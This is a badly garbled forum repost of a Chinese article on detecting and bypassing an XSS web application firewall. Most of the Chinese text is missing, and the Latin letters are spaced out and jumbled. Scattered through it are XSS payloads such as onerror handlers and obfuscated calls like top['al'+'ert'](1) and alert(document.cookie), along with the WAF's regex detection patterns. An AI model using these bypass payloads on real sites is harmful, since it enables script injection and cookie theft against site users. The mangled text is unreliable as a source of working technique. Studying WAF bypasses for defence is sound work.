[13516] 2018-12-10_一则有趣的XSSWAF规则探测与绕过

文档创建者:s7ckTeam
浏览次数:5
最后更新:2025-01-18
2018-12-10_一则有趣的XSSWAF规则探测与绕过 X S S   W A F C o n a n   F r e e B u f   2 0 1 8 - 1 2 - 1 0 B X S S ( ) ( ) W A F 便 便 X S S   W A F b y p a s s w a f 使 x s s " ; > d d d ` w a f w a c h r o m e e l e m e n t s o u r c e x s s w a f   b y p a s s : w a p a y l o a d p a y l o a d ( w a f ) p a y l o a d 1 .   7 b w a f , c a l l b a c k x s s 2 .   x s s : " > d d d ` 3 .   p a y l o a d ( 使 ) : ' ' ; < i m g > < s c r i p t > < i m g   s r c = x   o n e r r o r = a l e r t ( 1 ) >
w a f 4 .   w a f : ( w a f , x s s t r i k e w a f ) x s s t r i k e < s c r i p t > a l e r t ( 1 ) < s c r i p t >
w a f :   ( w a f )     < s c r i p t s + [ ^ > ] * s r c = . *
5 .   w a f ( 1 )     w a w a         a l e r t ( 1 ) w a w a   o n e r r o r w a < i m g >
s r c = x w a w a w a   ( 2 )   w a , w a w a w a < i m g   s r c = x > < i m g   s r c = x   o n e r r o r = x x x x >
w a w a w a w a ( 3 )   w a f   w a w a   < i m g   s r c = x   o n e r r o r = a l e r t ( > < i m g   s r c = x   o n e r r o r = a l e r t ( x x x x > < i m g   s r c = x   o n e r r o r = a a a ( b b b >
a a a , a l e r t p r o m p t / c o n f i r m   w a   , w a   o n e r r o r = a l e r t ( x x x x o n e r r o r = a l e r t ( x x x x )
w a w a f ( w a f , w a f ( w o n 1 1 1 1 w a = = ) w a f   p a y l o a d w a ( w a ) < i m g   s r c = x   o n e r r o r = a l e r t ( x x x x > o n e r r o r = a l e r t ( x x x x < [ ^ > ] * s + o n w + = ( ? : p r o m p t | a l e r t | c o n f i r m ) { 1 } ( w + < . . a a a a   o n b b b b = a l e r t ( c c c o n w + = ( ? : p r o m p t | a l e r t | c o n f i r m ) { 1 } ( w + ) o n w + = ( ? : p r o m p t | a l e r t | c o n f i r m ) { 1 } ( w + ) < [ ^ > ] * s + o n w + = ( ? : p r o m p t | a l e r t | c o n f i r m ) { 1 } ( w +
使 b y p a s s , c o n s o l e . l o g t o p 线 ( ) w a ( 4 )   7 : a .   使 s c r i p t p a y l o a d ( w a f p a y l o a d , b y p a s s ) +   p a y l o a d : t o p [ ' a l e r t ' ] ( 1 ) t o p [ ' a l ' + ' e r t ' ] ( 1 ) [ ] w < i m g   s r c = x   o n e r r o r = t o p [ ' a l e r t ' ] ( 1 ) > < / s c r i p t > < s c r i p t > < / s c r i p t > < / s c r i p t > < s c r i p t > < / s c r i p t > a a a < / s c r i p t > b b b < s c r i p t > c c c
a a a c c c a a a + , a   c w a p a y l o a d : b .   7   w a < s c r i p t > < s c r i p t > . * ( . * ) a l e r t ( d o c u m e n t . c o o k i e ) c o n s o l e . l o g a l e r t ( d o c u m e n t . c o o k i e ) < / s c r i p t > b b b < s c r i p t > c o n s o l e . l o g < s c r i p t > < s c r i p t > a a a ( b b b )
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则